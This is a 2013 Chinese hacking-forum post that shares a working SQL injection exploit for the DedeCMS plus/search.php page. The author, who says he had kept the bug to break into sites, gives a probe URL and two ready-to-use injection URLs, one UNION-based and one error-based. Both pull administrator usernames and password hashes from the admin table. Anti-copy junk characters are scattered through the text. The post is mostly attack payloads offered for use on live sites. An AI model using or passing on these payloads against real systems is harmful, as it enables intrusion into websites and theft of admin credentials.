中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ- I% N% ?7 q- j: [

' ~- s: }- F" G. P哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
* c, u/ \% x/ C
9 Q" h' }7 ~5 I+ a$ c! E既然已经发出来了,我就把我自己搞的exp发下吧。。唉。- ~4 i' {8 j9 \
  ~/ n+ Z9 X  C
我一般是这样测试的:
# ]( @) I  [" L$ _& R
. ?) ]9 h! _& ]$ W6 |提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
: ]' }, g  }8 q! E7 q
" \0 X1 J  D- M% p5 K- `转载不加作者名的没JJ
, f  h/ f3 _; p8 f9 m1 |; m* [) N$ c8 l9 \
作者:鬼哥. B6 T0 P, s+ m0 Z9 M1 ]9 c

8 j  E$ c7 Z, {7 m ( T. y1 }- d. M( ]1 S2 {- R& N
% n; z2 n7 K6 C) a' g
看结果如果提示" u5 a7 _- \/ p, [

: w% V7 A4 @( W* ASafe Alert: Request Error step 2 !
' ?& t4 T- Z4 ]3 h5 z
$ i, ]4 K$ O% k  K/ a; U: n  o; ?( H$ \那么直接用下面的exp
+ u% |2 P. c" G: E' r7 ^1 o
, ]! f2 V# ]' `9 P6 O* n: v  `# fxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a) a1 h1 n  t) X8 D4 f" R, I
4 [; j) Q/ p, f3 B9 w

7 s7 q1 T# O5 n- c+ Z看结果如果提示
9 n3 v7 ^1 W! [& D" T, [( C9 N1 B, T6 P# z# d
Safe Alert: Request Error step 1 !0 e$ j$ Y  f  ?$ j* @( ]

( R% O; @1 g  ?那么直接用下面的exp6 F8 h8 B+ w8 x% p
! A9 ^' W2 v& j, V, t
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
" @! f. m$ Y/ F$ U
! d) |+ _0 B  @: R  s4 `* J1 O$ q% w' B$ d$ U
如果正常显示证明漏洞不存在了。7 q" q1 L1 L9 t8 @6 Q' T

+ ~8 X; Y1 T' i9 i3 ?- X转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2